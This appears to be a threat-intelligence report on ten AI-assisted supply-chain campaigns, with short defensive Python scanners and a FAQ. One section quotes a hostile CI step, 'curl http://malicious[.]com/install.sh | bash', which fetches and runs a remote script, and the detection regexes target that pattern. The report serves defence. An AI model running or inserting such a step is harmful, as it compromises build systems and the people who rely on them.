Executive Summary: Between Q4 2025 and Q1 2026, supply-chain attacks increased 340% year-over-year, driven by AI-generated code that exploits trust in automated toolchains. Attackers weaponized open-source repositories, CI/CD pipelines, and LLM-powered dev tools to inject malicious dependencies disguised as benign AI-generated artifacts. This report analyzes the Top 10 campaigns, their TTPs (Tactics, Techniques, and Procedures), and the countermeasures required to mitigate future AI-augmented threats.
In November 2025, a campaign dubbed “PolyCode” infected 2,300+ repositories with AI-generated Python packages (e.g., numpy-ai, pandas-ml). Attackers used LLMs to generate statistically plausible code snippets embedding reverse shells. These packages passed initial static analysis due to AI-optimized obfuscation (e.g., variable renaming, control-flow flattening). The attack vector exploited the lack of AI-aware SBOM validation in CI/CD pipelines.
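A first line of defense against this class of package is name screening at dependency-review time. The sketch below flags names that graft AI-themed suffixes onto popular packages; the base-name and suffix lists are illustrative assumptions, not a vetted blocklist.

```python
# Minimal sketch: flag dependency names that append AI-themed suffixes to
# well-known packages (e.g., numpy-ai, pandas-ml). The lists below are
# hypothetical starting points, not a curated blocklist.
POPULAR_BASES = {"numpy", "pandas", "requests", "scipy", "torch"}
AI_SUFFIXES = ("-ai", "-ml", "-llm", "-gpt")

def is_suspicious(name: str) -> bool:
    """True if `name` looks like a popular package plus an AI suffix."""
    return any(
        name.endswith(suffix) and name[: -len(suffix)] in POPULAR_BASES
        for suffix in AI_SUFFIXES
    )

if __name__ == "__main__":
    for candidate in ("numpy-ai", "pandas-ml", "requests"):
        print(candidate, "->", "suspicious" if is_suspicious(candidate) else "ok")
```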
The “CICD-AI” campaign (December 2025) targeted Jenkins and GitHub Actions workflows. Attackers used LLMs to generate benign-looking patch files (e.g., fix-security-vulnerability.patch) that introduced backdoors. The patches were AI-optimized to match project style, reducing suspicion. This technique bypassed traditional patch validation by exploiting developer trust in AI-generated fixes.
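One way to operationalize patch skepticism is to screen the added lines of every incoming diff for shell-spawn and remote-fetch primitives before human review. A minimal sketch; the pattern list is a hypothetical starting point, not a complete ruleset.

```python
import re
import sys

# Heuristic: a patch labeled as a security fix should rarely ADD lines that
# spawn shells or fetch remote code. Scan unified-diff additions only.
RISKY = re.compile(r"(curl|wget|os\.system|subprocess|eval\(|exec\()")

def risky_additions(patch_text: str) -> list[str]:
    """Return added lines in a unified diff that match risky primitives."""
    return [
        line
        for line in patch_text.splitlines()
        if line.startswith("+") and not line.startswith("+++") and RISKY.search(line)
    ]

if __name__ == "__main__":
    with open(sys.argv[1], encoding="utf-8") as fh:
        for hit in risky_additions(fh.read()):
            print("flag for manual review:", hit)
```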
In January 2026, the “RepoMimic” attack compromised 5,000+ GitHub repositories by injecting AI-generated READMEs, documentation, and code samples. The AI mimicked the style of trusted maintainers, embedding hidden exploit instructions in documentation. Users who cloned repositories unknowingly executed malicious scripts during setup.
The “PackageBlend” attack (February 2026) used AI to generate polymorphic JavaScript and Python packages. Each installation produced a unique obfuscated payload, evading signature-based detection. The AI optimized payload delivery based on runtime environment (e.g., Docker vs. bare metal).
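Install-time polymorphism of this kind can be surfaced with a reproducibility check: install the same artifact twice into fresh environments and compare file hashes, since a deterministic package should produce identical trees. The sketch below assumes a POSIX virtualenv layout and uses a placeholder package name.

```python
import hashlib
import pathlib
import subprocess
import sys
import tempfile

def hash_tree(root: pathlib.Path) -> dict:
    """Map each .py file under `root` to its SHA-256 digest."""
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*.py"))
    }

def install_and_hash(package: str) -> dict:
    """Install `package` into a throwaway venv (POSIX layout assumed)."""
    with tempfile.TemporaryDirectory() as tmp:
        env = pathlib.Path(tmp) / "venv"
        subprocess.run([sys.executable, "-m", "venv", str(env)], check=True)
        pip = env / "bin" / "pip"
        subprocess.run([str(pip), "install", "--no-cache-dir", package], check=True)
        site = next(env.glob("lib/python*/site-packages"))
        return hash_tree(site)

if __name__ == "__main__":
    pkg = sys.argv[1] if len(sys.argv) > 1 else "some-package"  # placeholder name
    first, second = install_and_hash(pkg), install_and_hash(pkg)
    print("identical installs" if first == second
          else "DIVERGENT installs: possible polymorphic payload")
```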
In March 2026, the “IDE-AI” campaign distributed malicious VS Code and JetBrains plugins via AI-generated marketplace listings. The plugins included AI-optimized autocomplete snippets that delivered ransomware payloads when activated. The AI ensured the snippets matched project context, reducing detection likelihood.
The “TemplateHijack” attack (Q4 2025) compromised GitHub Actions and GitLab CI templates. Attackers used LLMs to generate CI templates with AI-optimized malicious steps (e.g., run: curl http://malicious[.]com/install.sh | bash). The templates were distributed via AI-generated “optimization” suggestions in dev forums.
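Templates can be screened for exactly this pipe-remote-script-to-shell pattern before adoption. A minimal sketch; the regex is an illustrative starting point, not a complete ruleset.

```python
import re
import sys

# Flag "fetch a remote script and pipe it to a shell" steps in CI files.
PIPE_TO_SHELL = re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh")

def scan(path: str):
    """Yield (line number, line) for every risky step in a CI file."""
    with open(path, encoding="utf-8") as fh:
        for lineno, line in enumerate(fh, start=1):
            if PIPE_TO_SHELL.search(line):
                yield lineno, line.rstrip()

if __name__ == "__main__":
    for path in sys.argv[1:]:
        for lineno, line in scan(path):
            print(f"{path}:{lineno}: {line}")
```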
Building on the dependency confusion technique first publicized in 2021, the “AI-Confusion” campaign (January 2026) used AI to generate plausible internal package names (e.g., @company/internal-utils). The AI mimicked the organization’s naming conventions, tricking developers into installing malicious replacements from public repositories.
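Exposure to this variant can be measured by checking whether internal names also resolve on the public index. The sketch below uses PyPI's public JSON endpoint; the internal package name shown is a placeholder.

```python
import sys
import urllib.error
import urllib.request

def exists_on_pypi(name: str) -> bool:
    """True if `name` resolves on the public PyPI index."""
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False  # no public shadow package
        raise

if __name__ == "__main__":
    for internal in sys.argv[1:] or ["company-internal-utils"]:  # placeholder
        if exists_on_pypi(internal):
            print(f"WARNING: {internal} exists publicly; possible confusion target")
        else:
            print(f"{internal}: no public shadow package found")
```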
In February 2026, the “FalseFlag” attack used AI to generate code that intentionally triggered false positives in SAST/DAST tools. The resulting alert fatigue pushed security teams to whitelist broad classes of benign-looking AI-generated artifacts, creating gaps through which malicious payloads slipped.
The “ConvinceAI” campaign (March 2026) used LLMs to craft convincing phishing emails and Slack messages targeting developers. The AI personalized messages based on repository activity, increasing click-through rates for malicious AI-generated links (e.g., https://fix-bug[.]ai).
The “SBOM-AI” arms race saw attackers use LLMs to generate fake SBOMs that matched AI-generated codebases. Defenders countered with AI-driven SBOM validation, but attackers deployed adversarial LLMs to mimic benign SBOM outputs, creating a cat-and-mouse dynamic.
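Whatever the validator, the baseline check remains mechanical: recompute artifact hashes and compare them to what the SBOM declares. A minimal sketch, assuming a CycloneDX-style JSON SBOM and a hypothetical per-component file property pointing at the artifact on disk:

```python
import hashlib
import json
import pathlib
import sys

def verify_sbom(sbom_path: str) -> list:
    """Return component names whose on-disk SHA-256 differs from the SBOM."""
    sbom = json.loads(pathlib.Path(sbom_path).read_text())
    mismatches = []
    for comp in sbom.get("components", []):
        file_hint = comp.get("file")  # assumed custom property, not core CycloneDX
        declared = {h["alg"]: h["content"] for h in comp.get("hashes", [])}
        if not file_hint or "SHA-256" not in declared:
            continue  # nothing verifiable for this component
        actual = hashlib.sha256(pathlib.Path(file_hint).read_bytes()).hexdigest()
        if actual != declared["SHA-256"]:
            mismatches.append(comp.get("name", file_hint))
    return mismatches

if __name__ == "__main__":
    bad = verify_sbom(sys.argv[1])
    print("SBOM verified" if not bad else f"hash mismatches: {bad}")
```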
Countermeasure tooling referenced in this report includes sbom-ai-validator, PolyShield, and AI-Threat-Share.

Q1: How can organizations detect AI-generated malicious dependencies?
Use AI-aware SBOM tools that cross-reference AI-generated artifacts with ground-truth repositories and historical patterns. Deploy runtime behavioral analysis to detect polymorphic payloads. Oracle-42’s PolyShield and sbom-ai-validator are designed for this purpose.
Q2: What is the most effective defense against AI-generated CI/CD attacks?
The most effective defense is a trust-but-verify model for CI/CD. Validate all AI-generated patches and dependencies in isolated sandboxes before merging into production. Implement deny-by-default policies for AI-generated artifacts in critical paths.
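A minimal sketch of such a sandbox step, assuming Docker is available and the candidate wheel has already been downloaded to disk (image name, paths, and flags are illustrative):

```python
import pathlib
import subprocess
import sys

def sandbox_install(wheel_path: str) -> bool:
    """Install a pre-downloaded wheel inside a no-network container."""
    host_wheel = pathlib.Path(wheel_path).resolve()  # Docker needs absolute paths
    cmd = [
        "docker", "run", "--rm",
        "--network", "none",                          # deny all egress to the payload
        "-v", f"{host_wheel}:/pkg/candidate.whl:ro",  # mount artifact read-only
        "python:3.12-slim",
        "pip", "install", "--no-index", "--no-deps", "/pkg/candidate.whl",
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.returncode == 0

if __name__ == "__main__":
    ok = sandbox_install(sys.argv[1])
    print("sandbox install succeeded" if ok else "sandbox install FAILED: inspect logs")
```

Pairing this with runtime monitoring inside the container (file writes, spawned processes) supplies the behavioral signal needed to catch the polymorphic payloads described above.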